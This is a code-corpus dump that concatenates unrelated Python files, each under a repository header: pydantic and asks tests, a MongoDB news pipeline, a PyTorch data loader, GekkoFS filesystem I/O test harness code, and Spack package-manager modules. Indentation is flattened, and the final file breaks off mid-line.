pet_type: Literal['dog'] = Field(alias='T')
d: str
with pytest.raises(
ConfigError, match=re.escape("Aliases for discriminator 'pet_type' must be the same (got T, U)")
):
class Model(BaseModel):
pet: Union[Cat, Dog] = Field(discriminator='pet_type')
def test_alias_same():
class Cat(BaseModel):
pet_type: Literal['cat'] = Field(alias='typeOfPet')
c: str
class Dog(BaseModel):
pet_type: Literal['dog'] = Field(alias='typeOfPet')
d: str
class Model(BaseModel):
pet: Union[Cat, Dog] = Field(discriminator='pet_type')
assert Model(**{'pet': {'typeOfPet': 'dog', 'd': 'milou'}}).pet.pet_type == 'dog'
def test_nested():
class Cat(BaseModel):
pet_type: Literal['cat']
name: str
class Dog(BaseModel):
pet_type: Literal['dog']
name: str
CommonPet = Annotated[Union[Cat, Dog], Field(discriminator='pet_type')]
class Lizard(BaseModel):
pet_type: Literal['reptile', 'lizard']
name: str
class Model(BaseModel):
pet: Union[CommonPet, Lizard] = Field(..., discriminator='pet_type')
n: int
assert isinstance(Model(**{'pet': {'pet_type': 'dog', 'name': 'Milou'}, 'n': 5}).pet, Dog)
@pytest.mark.skipif(sys.version_info < (3, 7), reason='generics only supported for python 3.7 and above')
def test_generic():
T = TypeVar('T')
class Success(GenericModel, Generic[T]):
type: Literal['Success'] = 'Success'
data: T
class Failure(BaseModel):
type: Literal['Failure'] = 'Failure'
error_message: str
class Container(GenericModel, Generic[T]):
result: Union[Success[T], Failure] = Field(discriminator='type')
with pytest.raises(ValidationError, match="Discriminator 'type' is missing in value"):
Container[str].parse_obj({'result': {}})
with pytest.raises(
ValidationError,
match=re.escape("No match for discriminator 'type' and value 'Other' (allowed values: 'Success', 'Failure')"),
):
Container[str].parse_obj({'result': {'type': 'Other'}})
with pytest.raises(
ValidationError, match=re.escape('Container[str]\nresult -> Success[str] -> data\n field required')
):
Container[str].parse_obj({'result': {'type': 'Success'}})
# coercion is done properly
assert Container[str].parse_obj({'result': {'type': 'Success', 'data': 1}}).result.data == '1'
```
|
{
"source": "jean/asks",
"score": 2
}
|
#### File: asks/tests/test_request_object.py
```python
import h11
import pytest
from asks.request_object import RequestProcessor
def _catch_response(monkeypatch, headers, data):
req = RequestProcessor(None, 'get', "toot-toot", None)
events = [
h11._events.Response(status_code=200, headers=headers),
h11._events.Data(data=data),
h11._events.EndOfMessage(),
]
async def _recv_event(hconn):
return events.pop(0)
monkeypatch.setattr(req, '_recv_event', _recv_event)
monkeypatch.setattr(req, 'host', 'lol')
cr = req._catch_response(None)
try:
cr.send(None)
except StopIteration as e:
response = e.value
return response
def test_http1_1(monkeypatch):
response = _catch_response(monkeypatch, [('Content-Length', '5')], b'hello')
assert response.body == b'hello'
def test_http1_0(monkeypatch):
response = _catch_response(monkeypatch, [('Connection', 'close')], b'hello')
assert response.body == b'hello'
@pytest.mark.parametrize(['data', 'query_str'], [
[{'foo': 'bar', 'spam': None}, '?foo=bar'],
[{'zero': 0}, '?zero=0'],
[{'empty': ''}, '?empty='],
[{'false': False}, '?false=False'],
])
def test_dict_to_query(data, query_str):
assert RequestProcessor._dict_to_query(data) == query_str
```
|
{
"source": "jeanazuos/carrier_pigeon",
"score": 2
}
|
#### File: carrier_pigeon/pigeon_news/pipelines.py
```python
import json
from pymongo import MongoClient
import os
from datetime import datetime
import re
class PigeonNewsPipeline:
def mongo_config(self):
self.collection = os.environ.get('MONGO_COLLECTION')
self.uri = os.environ.get('MONGODB_HOSTNAME')
self.database = os.environ.get('MONGODB_DATABASE')
self.port = int(os.environ.get('MONGO_PORT'))
self.user = os.environ.get('MONGODB_USERNAME')
self.password = os.environ.get('MONGODB_PASSWORD')
self.client = MongoClient(
self.uri,
self.port,
username = self.user,
password = <PASSWORD>
)
self.db = self.client[self.database]
# Abre conexao com banco
def open_spider(self, spider):
self.mongo_config()
# Fecha conexao com banco
def close_spider(self, spider):
self.client.close()
def process_item(self, item, spider):
# Clean tags
item = cleaner(item)
# Check if title exists to don't duplicated
if not self.get_one_data("title", item['title']):
self.set_data(item)
else:
# implement log
print("Noticia já existente")
def set_data(self, item):
self.db[self.collection].insert(dict(item))
# it's a find_one() to return a single data
def get_one_data(self, key, value):
return self.db[self.collection].find_one({key: value})
# regex to remove html and entities like <, >,  
def tags_remover(content):
cleaner = re.compile('<.*?>|(&.+;)|\s{2,6}')
content = re.sub(cleaner,'',content)
return content
# Parser method
def cleaner(item):
try:
content = {}
if item.get('title'):
title = item.get('title')
content['title'] = tags_remover(title)
if item.get('link'):
link = item.get('link')
content['link'] = tags_remover(link)
if item.get('description'):
description = item.get('description')
content['description'] = tags_remover(description)
if item.get('publication_date'):
publication = item.get('publication_date')
content['publication_date'] = tags_remover(publication)
if item.get('media'):
media = item.get('media')
content['media'] = media
# Add time now to dict
content["processing_date"] = processing_date()
return content
except ValueError:
#implementar lib de log
print("Nao foi possivel encontrar a tag title no xml")
def processing_date():
now = datetime.now()
today = now.strftime("%d/%m/%Y %H:%M:%S")
return today
```
|
{
"source": "JeanBaptisteGouray/mindgan",
"score": 3
}
|
#### File: mindgan/module_mind/data_loader.py
```python
from torchvision import transforms, datasets
import os
import torch
import pickle as pkl
import numpy as np
class EncodedFFHQ(torch.utils.data.Dataset):
"""Encoded Images dataset."""
def __init__(self, data_path):
self.data_path = data_path
self.liste = os.listdir(data_path)
def __len__(self):
return len(self.liste)
def __getitem__(self, idx):
with open(self.data_path + '/' + self.liste[idx], 'rb') as f:
latent = pkl.load(f)
latent = np.asarray(latent, dtype=np.float32)
return latent
```
|
{
"source": "JeanBaptisteScanavino/bot_discord_find_game",
"score": 3
}
|
#### File: right/in_memory/games_repository.py
```python
class InMemoryGamesRepository():
def __init__(self):
self.list = ['Mario', 'Sonic', '<NAME>']
def retrieveAll(self):
return self.list
```
|
{
"source": "jeanbez/gekko-fwd",
"score": 2
}
|
#### File: integration/harness/io.py
```python
import ctypes
from marshmallow import Schema, fields, pre_load, post_load
from collections import namedtuple
class DIR_p(fields.Field):
"""Field that deserializes a ::DIR* return value"""
def _deserialize(self, value, attr, data, **kwargs):
return ctypes.c_void_p(value)
class Errno(fields.Field):
"""Field that deserialies an errno return value"""
def _deserialize(self, value, attr, data, **kwargs):
return int(value)
class ByteList(fields.Field):
"""Field that deserializes a list of bytes"""
def _deserialize(self, value, attr, data, **kwargs):
return bytes(value)
class StructTimespecSchema(Schema):
"""Schema that deserializes a struct timespec"""
tv_sec = fields.Integer(required=True)
tv_nsec = fields.Integer(required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StructTimespec',
['tv_sec', 'tv_nsec'])(**data)
class StructStatSchema(Schema):
"""Schema that deserializes a struct stat"""
st_dev = fields.Integer(required=True)
st_ino = fields.Integer(required=True)
st_mode = fields.Integer(required=True)
st_nlink = fields.Integer(required=True)
st_uid = fields.Integer(required=True)
st_gid = fields.Integer(required=True)
st_rdev = fields.Integer(required=True)
st_size = fields.Integer(required=True)
st_blksize = fields.Integer(required=True)
st_blocks = fields.Integer(required=True)
st_atim = fields.Nested(StructTimespecSchema)
st_mtim = fields.Nested(StructTimespecSchema)
st_ctim = fields.Nested(StructTimespecSchema)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StructStat',
['st_dev', 'st_ino', 'st_mode', 'st_nlink', 'st_uid',
'st_gid', 'st_rdev', 'st_size', 'st_blksize', 'st_blocks',
'st_atim', 'st_mtim', 'st_ctim'])(**data)
class StructStatxTimestampSchema(Schema):
"""Schema that deserializes a struct timespec"""
tv_sec = fields.Integer(required=True)
tv_nsec = fields.Integer(required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StructStatxTimestampSchema',
['tv_sec', 'tv_nsec'])(**data)
class StructStatxSchema(Schema):
"""Schema that deserializes a struct stat"""
stx_mask = fields.Integer(required=True)
stx_blksize = fields.Integer(required=True)
stx_attributes = fields.Integer(required=True)
stx_nlink = fields.Integer(required=True)
stx_uid = fields.Integer(required=True)
stx_gid = fields.Integer(required=True)
stx_mode = fields.Integer(required=True)
stx_ino = fields.Integer(required=True)
stx_size = fields.Integer(required=True)
stx_blocks = fields.Integer(required=True)
stx_attributes_mask = fields.Integer(required=True)
stx_atime = fields.Nested(StructStatxTimestampSchema)
stx_btime = fields.Nested(StructStatxTimestampSchema)
stx_ctime = fields.Nested(StructStatxTimestampSchema)
stx_mtime = fields.Nested(StructStatxTimestampSchema)
stx_rdev_major = fields.Integer(required=True)
stx_rdev_minor = fields.Integer(required=True)
stx_dev_major = fields.Integer(required=True)
stx_dev_minor = fields.Integer(required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StructStatx',
['stx_mask', 'stx_blksize', 'stx_attributes', 'stx_nlink', 'stx_uid',
'stx_gid', 'stx_mode', 'stx_ino', 'stx_size', 'stx_blocks', 'stx_attributes_mask',
'stx_atime', 'stx_btime', 'stx_ctime', 'stx_mtime', 'stx_rdev_major',
'stx_rdev_minor', 'stx_dev_major', 'stx_dev_minor'])(**data)
class DirentStruct(Schema):
"""Schema that deserializes a struct dirent"""
d_ino = fields.Integer(required=True)
d_off = fields.Integer(required=True)
d_reclen = fields.Integer(required=True)
d_type = fields.Integer(required=True)
d_name = fields.Str(required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('DirentStruct',
['d_ino', 'd_off', 'd_reclen', 'd_type', 'd_name'])(**data)
class MkdirOutputSchema(Schema):
"""Schema to deserialize the results of a mkdir() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('MkdirReturn', ['retval', 'errno'])(**data)
class OpenOutputSchema(Schema):
"""Schema to deserialize the results of an open() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('OpenReturn', ['retval', 'errno'])(**data)
class OpendirOutputSchema(Schema):
"""Schema to deserialize the results of an opendir() execution"""
dirp = DIR_p(required=True, allow_none=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('OpendirReturn', ['dirp', 'errno'])(**data)
class ReadOutputSchema(Schema):
"""Schema to deserialize the results of a read() execution"""
buf = ByteList(allow_none=True)
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('ReadReturn', ['buf', 'retval', 'errno'])(**data)
class PreadOutputSchema(Schema):
"""Schema to deserialize the results of a pread() execution"""
buf = ByteList(allow_none=True)
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('PReadReturn', ['buf', 'retval', 'errno'])(**data)
class ReadvOutputSchema(Schema):
"""Schema to deserialize the results of a read() execution"""
buf_0 = ByteList(allow_none=True)
buf_1 = ByteList(allow_none=True)
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('ReadvReturn', ['buf_0', 'buf_1', 'retval', 'errno'])(**data)
class PreadvOutputSchema(Schema):
"""Schema to deserialize the results of a read() execution"""
buf_0 = ByteList(allow_none=True)
buf_1 = ByteList(allow_none=True)
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('PReadvReturn', ['buf_0', 'buf_1', 'retval', 'errno'])(**data)
class ReaddirOutputSchema(Schema):
"""Schema to deserialize the results of a readdir() execution"""
dirents = fields.List(fields.Nested(DirentStruct), allow_none=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('ReaddirReturn', ['dirents', 'errno'])(**data)
class RmdirOutputSchema(Schema):
"""Schema to deserialize the results of an opendir() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('RmdirReturn', ['retval', 'errno'])(**data)
class WriteOutputSchema(Schema):
"""Schema to deserialize the results of a write() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('WriteReturn', ['retval', 'errno'])(**data)
class PwriteOutputSchema(Schema):
"""Schema to deserialize the results of a pwrite() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('PWriteReturn', ['retval', 'errno'])(**data)
class WritevOutputSchema(Schema):
"""Schema to deserialize the results of a writev() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('WritevReturn', ['retval', 'errno'])(**data)
class PwritevOutputSchema(Schema):
"""Schema to deserialize the results of a writev() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('PWritevReturn', ['retval', 'errno'])(**data)
class StatOutputSchema(Schema):
"""Schema to deserialize the results of a stat() execution"""
retval = fields.Integer(required=True)
statbuf = fields.Nested(StructStatSchema, required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StatReturn', ['retval', 'statbuf', 'errno'])(**data)
class StatxOutputSchema(Schema):
"""Schema to deserialize the results of a stat() execution"""
retval = fields.Integer(required=True)
statbuf = fields.Nested(StructStatxSchema, required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('StatxReturn', ['retval', 'statbuf', 'errno'])(**data)
class LseekOutputSchema(Schema):
"""Schema to deserialize the results of an open() execution"""
retval = fields.Integer(required=True)
errno = Errno(data_key='errnum', required=True)
@post_load
def make_object(self, data, **kwargs):
return namedtuple('LseekReturn', ['retval', 'errno'])(**data)
class IOParser:
OutputSchemas = {
'mkdir' : MkdirOutputSchema(),
'open' : OpenOutputSchema(),
'opendir' : OpendirOutputSchema(),
'read' : ReadOutputSchema(),
'pread' : PreadOutputSchema(),
'readv' : ReadvOutputSchema(),
'preadv' : PreadvOutputSchema(),
'readdir' : ReaddirOutputSchema(),
'rmdir' : RmdirOutputSchema(),
'write' : WriteOutputSchema(),
'pwrite' : PwriteOutputSchema(),
'writev' : WritevOutputSchema(),
'pwritev' : PwritevOutputSchema(),
'stat' : StatOutputSchema(),
'statx' : StatxOutputSchema(),
'lseek' : LseekOutputSchema(),
}
def parse(self, command, output):
if command in self.OutputSchemas:
return self.OutputSchemas[command].loads(output)
else:
raise ValueError(f"Unknown I/O command {command}")
```
#### File: integration/operations/test_read_operations.py
```python
import harness
from pathlib import Path
import errno
import stat
import os
import ctypes
import sh
import sys
import pytest
from harness.logger import logger
nonexisting = "nonexisting"
def test_read(gkfs_daemon, gkfs_client):
file = gkfs_daemon.mountdir / "file"
# create a file in gekkofs
ret = gkfs_client.open(file,
os.O_CREAT | os.O_WRONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# write a buffer we know
buf = b'42'
ret = gkfs_client.write(file, buf, len(buf))
assert ret.retval == len(buf) # Return the number of written bytes
assert ret.errno == 115 #FIXME: Should be 0!
# open the file to read
ret = gkfs_client.open(file,
os.O_RDONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# read the file
ret = gkfs_client.read(file, len(buf))
assert ret.buf == buf
assert ret.retval == len(buf) # Return the number of read bytes
assert ret.errno == 115 #FIXME: Should be 0!
def test_pread(gkfs_daemon, gkfs_client):
file = gkfs_daemon.mountdir / "file"
# create a file in gekkofs
ret = gkfs_client.open(file,
os.O_CREAT | os.O_WRONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# write a buffer we know
buf = b'42'
ret = gkfs_client.pwrite(file, buf, len(buf), 1024)
assert ret.retval == len(buf) # Return the number of written bytes
assert ret.errno == 115 #FIXME: Should be 0!
# open the file to read
ret = gkfs_client.open(file,
os.O_RDONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# read the file at offset 1024
ret = gkfs_client.pread(file, len(buf), 1024)
assert ret.buf == buf
assert ret.retval == len(buf) # Return the number of read bytes
assert ret.errno == 115 #FIXME: Should be 0!
def test_readv(gkfs_daemon, gkfs_client):
file = gkfs_daemon.mountdir / "file"
# create a file in gekkofs
ret = gkfs_client.open(file,
os.O_CREAT | os.O_WRONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# write a buffer we know
buf_0 = b'42'
buf_1 = b'24'
ret = gkfs_client.writev(file, buf_0, buf_1, 2)
assert ret.retval == len(buf_0) + len(buf_1) # Return the number of written bytes
assert ret.errno == 115 #FIXME: Should be 0!
# open the file to read
ret = gkfs_client.open(file,
os.O_RDONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# read the file
ret = gkfs_client.readv(file, len(buf_0), len(buf_1))
assert ret.buf_0 == buf_0
assert ret.buf_1 == buf_1
assert ret.retval == len(buf_0) + len(buf_1) # Return the number of read bytes
assert ret.errno == 115 #FIXME: Should be 0!
def test_preadv(gkfs_daemon, gkfs_client):
file = gkfs_daemon.mountdir / "file"
# create a file in gekkofs
ret = gkfs_client.open(file,
os.O_CREAT | os.O_WRONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# write a buffer we know
buf_0 = b'42'
buf_1 = b'24'
ret = gkfs_client.pwritev(file, buf_0, buf_1, 2, 1024)
assert ret.retval == len(buf_0) + len(buf_1) # Return the number of written bytes
assert ret.errno == 115 #FIXME: Should be 0!
# open the file to read
ret = gkfs_client.open(file,
os.O_RDONLY,
stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
assert ret.retval == 10000
assert ret.errno == 115 #FIXME: Should be 0!
# read the file
ret = gkfs_client.preadv(file, len(buf_0), len(buf_1), 1024)
assert ret.buf_0 == buf_0
assert ret.buf_1 == buf_1
assert ret.retval == len(buf_0) + len(buf_1) # Return the number of read bytes
assert ret.errno == 115 #FIXME: Should be 0!
```
|
{
"source": "jeanbez/spack",
"score": 2
}
|
#### File: spack/build_systems/octave.py
```python
import inspect
from spack.directives import extends
from spack.package_base import PackageBase, run_after
class OctavePackage(PackageBase):
"""Specialized class for Octave packages. See
https://www.gnu.org/software/octave/doc/v4.2.0/Installing-and-Removing-Packages.html
for more information.
This class provides the following phases that can be overridden:
1. :py:meth:`~.OctavePackage.install`
"""
# Default phases
phases = ['install']
# To be used in UI queries that require to know which
# build-system class we are using
build_system_class = 'OctavePackage'
extends('octave')
def setup_build_environment(self, env):
# octave does not like those environment variables to be set:
env.unset('CC')
env.unset('CXX')
env.unset('FC')
def install(self, spec, prefix):
"""Install the package from the archive file"""
inspect.getmodule(self).octave(
'--quiet',
'--norc',
'--built-in-docstrings-file=/dev/null',
'--texi-macros-file=/dev/null',
'--eval', 'pkg prefix %s; pkg install %s' %
(prefix, self.stage.archive_file))
# Testing
# Check that self.prefix is there after installation
run_after('install')(PackageBase.sanity_check_prefix)
```
#### File: spack/spack/cray_manifest.py
```python
import json
import jsonschema
import six
import llnl.util.tty as tty
import spack.cmd
import spack.hash_types as hash_types
from spack.schema.cray_manifest import schema as manifest_schema
#: Cray systems can store a Spack-compatible description of system
#: packages here.
default_path = '/opt/cray/pe/cpe-descriptive-manifest/'
compiler_name_translation = {
'nvidia': 'nvhpc',
}
def translated_compiler_name(manifest_compiler_name):
"""
When creating a Compiler object, Spack expects a name matching
one of the classes in `spack.compilers`. Names in the Cray manifest
may differ; for cases where we know the name refers to a compiler in
Spack, this function translates it automatically.
This function will raise an error if there is no recorded translation
and the name doesn't match a known compiler name.
"""
if manifest_compiler_name in compiler_name_translation:
return compiler_name_translation[manifest_compiler_name]
elif manifest_compiler_name in spack.compilers.supported_compilers():
return manifest_compiler_name
else:
# Try to fail quickly. This can occur in two cases: (1) the compiler
# definition (2) a spec can specify a compiler that doesn't exist; the
# first will be caught when creating compiler definition. The second
# will result in Specs with associated undefined compilers.
raise spack.compilers.UnknownCompilerError(
"Manifest parsing - unknown compiler: {0}"
.format(manifest_compiler_name))
def compiler_from_entry(entry):
compiler_name = translated_compiler_name(entry['name'])
paths = entry['executables']
version = entry['version']
arch = entry['arch']
operating_system = arch['os']
target = arch['target']
compiler_cls = spack.compilers.class_for_compiler_name(compiler_name)
spec = spack.spec.CompilerSpec(compiler_cls.name, version)
paths = [paths.get(x, None) for x in ('cc', 'cxx', 'f77', 'fc')]
return compiler_cls(
spec, operating_system, target, paths
)
def spec_from_entry(entry):
arch_str = ""
if 'arch' in entry:
arch_format = "arch={platform}-{os}-{target}"
arch_str = arch_format.format(
platform=entry['arch']['platform'],
os=entry['arch']['platform_os'],
target=entry['arch']['target']['name']
)
compiler_str = ""
if 'compiler' in entry:
compiler_format = "%{name}@{version}"
compiler_str = compiler_format.format(
name=translated_compiler_name(entry['compiler']['name']),
version=entry['compiler']['version']
)
spec_format = "{name}@{version} {compiler} {arch}"
spec_str = spec_format.format(
name=entry['name'],
version=entry['version'],
compiler=compiler_str,
arch=arch_str
)
package = spack.repo.get(entry['name'])
if 'parameters' in entry:
variant_strs = list()
for name, value in entry['parameters'].items():
# TODO: also ensure that the variant value is valid?
if not (name in package.variants):
tty.debug("Omitting variant {0} for entry {1}/{2}"
.format(name, entry['name'], entry['hash'][:7]))
continue
# Value could be a list (of strings), boolean, or string
if isinstance(value, six.string_types):
variant_strs.append('{0}={1}'.format(name, value))
else:
try:
iter(value)
variant_strs.append(
'{0}={1}'.format(name, ','.join(value)))
continue
except TypeError:
# Not an iterable
pass
# At this point not a string or collection, check for boolean
if value in [True, False]:
bool_symbol = '+' if value else '~'
variant_strs.append('{0}{1}'.format(bool_symbol, name))
else:
raise ValueError(
"Unexpected value for {0} ({1}): {2}".format(
name, str(type(value)), str(value)
)
)
spec_str += ' ' + ' '.join(variant_strs)
spec, = spack.cmd.parse_specs(spec_str.split())
for ht in [hash_types.dag_hash, hash_types.build_hash,
hash_types.full_hash]:
setattr(spec, ht.attr, entry['hash'])
spec._concrete = True
spec._hashes_final = True
spec.external_path = entry['prefix']
spec.origin = 'external-db'
spack.spec.Spec.ensure_valid_variants(spec)
return spec
def entries_to_specs(entries):
spec_dict = {}
for entry in entries:
try:
spec = spec_from_entry(entry)
spec_dict[spec._hash] = spec
except spack.repo.UnknownPackageError:
tty.debug("Omitting package {0}: no corresponding repo package"
.format(entry['name']))
except spack.error.SpackError:
raise
except Exception:
tty.warn("Could not parse entry: " + str(entry))
for entry in filter(lambda x: 'dependencies' in x, entries):
dependencies = entry['dependencies']
for name, properties in dependencies.items():
dep_hash = properties['hash']
deptypes = properties['type']
if dep_hash in spec_dict:
if entry['hash'] not in spec_dict:
continue
parent_spec = spec_dict[entry['hash']]
dep_spec = spec_dict[dep_hash]
parent_spec._add_dependency(dep_spec, deptypes)
return spec_dict
def read(path, apply_updates):
with open(path, 'r') as json_file:
json_data = json.load(json_file)
jsonschema.validate(json_data, manifest_schema)
specs = entries_to_specs(json_data['specs'])
tty.debug("{0}: {1} specs read from manifest".format(
path,
str(len(specs))))
compilers = list()
if 'compilers' in json_data:
compilers.extend(compiler_from_entry(x)
for x in json_data['compilers'])
tty.debug("{0}: {1} compilers read from manifest".format(
path,
str(len(compilers))))
if apply_updates and compilers:
spack.compilers.add_compilers_to_config(
compilers, init_config=False)
if apply_updates:
for spec in specs.values():
spack.store.db.add(spec, directory_layout=None)
```
#### File: spack/detection/common.py
```python
import collections
import itertools
import os
import os.path
import re
import sys
import six
import llnl.util.tty
import spack.config
import spack.spec
import spack.util.spack_yaml
is_windows = sys.platform == 'win32'
#: Information on a package that has been detected
DetectedPackage = collections.namedtuple(
'DetectedPackage', ['spec', 'prefix']
)
def _externals_in_packages_yaml():
"""Return all the specs mentioned as externals in packages.yaml"""
packages_yaml = spack.config.get('packages')
already_defined_specs = set()
for pkg_name, package_configuration in packages_yaml.items():
for item in package_configuration.get('externals', []):
already_defined_specs.add(spack.spec.Spec(item['spec']))
return already_defined_specs
def _pkg_config_dict(external_pkg_entries):
"""Generate a package specific config dict according to the packages.yaml schema.
This does not generate the entire packages.yaml. For example, given some
external entries for the CMake package, this could return::
{
'externals': [{
'spec': '[email protected]',
'prefix': '/opt/cmake-3.17.1/'
}, {
'spec': '[email protected]',
'prefix': '/opt/cmake-3.16.5/'
}]
}
"""
pkg_dict = spack.util.spack_yaml.syaml_dict()
pkg_dict['externals'] = []
for e in external_pkg_entries:
if not _spec_is_valid(e.spec):
continue
external_items = [('spec', str(e.spec)), ('prefix', e.prefix)]
if e.spec.external_modules:
external_items.append(('modules', e.spec.external_modules))
if e.spec.extra_attributes:
external_items.append(
('extra_attributes',
spack.util.spack_yaml.syaml_dict(e.spec.extra_attributes.items()))
)
# external_items.extend(e.spec.extra_attributes.items())
pkg_dict['externals'].append(
spack.util.spack_yaml.syaml_dict(external_items)
)
return pkg_dict
def _spec_is_valid(spec):
try:
str(spec)
except spack.error.SpackError:
# It is assumed here that we can at least extract the package name from
# the spec so we can look up the implementation of
# determine_spec_details
msg = 'Constructed spec for {0} does not have a string representation'
llnl.util.tty.warn(msg.format(spec.name))
return False
try:
spack.spec.Spec(str(spec))
except spack.error.SpackError:
llnl.util.tty.warn(
'Constructed spec has a string representation but the string'
' representation does not evaluate to a valid spec: {0}'
.format(str(spec))
)
return False
return True
def is_executable(file_path):
"""Return True if the path passed as argument is that of an executable"""
return os.path.isfile(file_path) and os.access(file_path, os.X_OK)
def _convert_to_iterable(single_val_or_multiple):
x = single_val_or_multiple
if x is None:
return []
elif isinstance(x, six.string_types):
return [x]
elif isinstance(x, spack.spec.Spec):
# Specs are iterable, but a single spec should be converted to a list
return [x]
try:
iter(x)
return x
except TypeError:
return [x]
def executable_prefix(executable_dir):
"""Given a directory where an executable is found, guess the prefix
(i.e. the "root" directory of that installation) and return it.
Args:
executable_dir: directory where an executable is found
"""
# Given a prefix where an executable is found, assuming that prefix
# contains /bin/, strip off the 'bin' directory to get a Spack-compatible
# prefix
assert os.path.isdir(executable_dir)
components = executable_dir.split(os.sep)
if 'bin' not in components:
return executable_dir
idx = components.index('bin')
return os.sep.join(components[:idx])
def library_prefix(library_dir):
"""Given a directory where an library is found, guess the prefix
(i.e. the "root" directory of that installation) and return it.
Args:
library_dir: directory where an library is found
"""
# Given a prefix where an library is found, assuming that prefix
# contains /lib/ or /lib64/, strip off the 'lib' or 'lib64' directory
# to get a Spack-compatible prefix
assert os.path.isdir(library_dir)
components = library_dir.split(os.sep)
if 'lib64' in components:
idx = components.index('lib64')
return os.sep.join(components[:idx])
elif 'lib' in components:
idx = components.index('lib')
return os.sep.join(components[:idx])
else:
return library_dir
def update_configuration(detected_packages, scope=None, buildable=True):
"""Add the packages passed as arguments to packages.yaml
Args:
detected_packages (list): list of DetectedPackage objects to be added
scope (str): configuration scope where to add the detected packages
buildable (bool): whether the detected packages are buildable or not
"""
predefined_external_specs = _externals_in_packages_yaml()
pkg_to_cfg, all_new_specs = {}, []
for package_name, entries in detected_packages.items():
new_entries = [
e for e in entries if (e.spec not in predefined_external_specs)
]
pkg_config = _pkg_config_dict(new_entries)
all_new_specs.extend([
spack.spec.Spec(x['spec']) for x in pkg_config.get('externals', [])
])
if buildable is False:
pkg_config['buildable'] = False
pkg_to_cfg[package_name] = pkg_config
pkgs_cfg = spack.config.get('packages', scope=scope)
pkgs_cfg = spack.config.merge_yaml(pkgs_cfg, pkg_to_cfg)
spack.config.set('packages', pkgs_cfg, scope=scope)
return all_new_specs
def find_win32_additional_install_paths():
"""Not all programs on Windows live on the PATH
Return a list of other potential install locations.
"""
windows_search_ext = []
cuda_re = r'CUDA_PATH[a-zA-Z1-9_]*'
# The list below should be expanded with other
# common Windows install locations as neccesary
path_ext_keys = ['I_MPI_ONEAPI_ROOT',
'MSMPI_BIN',
'MLAB_ROOT',
'NUGET_PACKAGES']
user = os.environ["USERPROFILE"]
add_path = lambda key: re.search(cuda_re, key) or key in path_ext_keys
windows_search_ext.extend([os.environ[key] for key
in os.environ.keys() if
add_path(key)])
# note windows paths are fine here as this method should only ever be invoked
# to interact with Windows
# Add search path for default Chocolatey (https://github.com/chocolatey/choco)
# install directory
windows_search_ext.append("C:\\ProgramData\\chocolatey\\bin")
# Add search path for NuGet package manager default install location
windows_search_ext.append(os.path.join(user, ".nuget", "packages"))
windows_search_ext.extend(
spack.config.get("config:additional_external_search_paths", default=[])
)
windows_search_ext.extend(spack.util.environment.get_path('PATH'))
return windows_search_ext
def compute_windows_program_path_for_package(pkg):
"""Given a package, attempt to compute its Windows
program files location, return list of best guesses
Args:
pkg (spack.package_base.Package): package for which
Program Files location is to be computed
"""
if not is_windows:
return []
# note windows paths are fine here as this method should only ever be invoked
# to interact with Windows
program_files = 'C:\\Program Files{}\\{}'
return[program_files.format(arch, name) for
arch, name in itertools.product(("", " (x86)"),
(pkg.name, pkg.name.capitalize()))]
```
#### File: spack/schema/modules.py
```python
import warnings
import spack.schema.environment
import spack.schema.projections
#: Matches a spec or a multi-valued variant but not another
#: valid keyword.
#:
#: THIS NEEDS TO BE UPDATED FOR EVERY NEW KEYWORD THAT
#: IS ADDED IMMEDIATELY BELOW THE MODULE TYPE ATTRIBUTE
spec_regex = r'(?!hierarchy|core_specs|verbose|hash_length|whitelist|' \
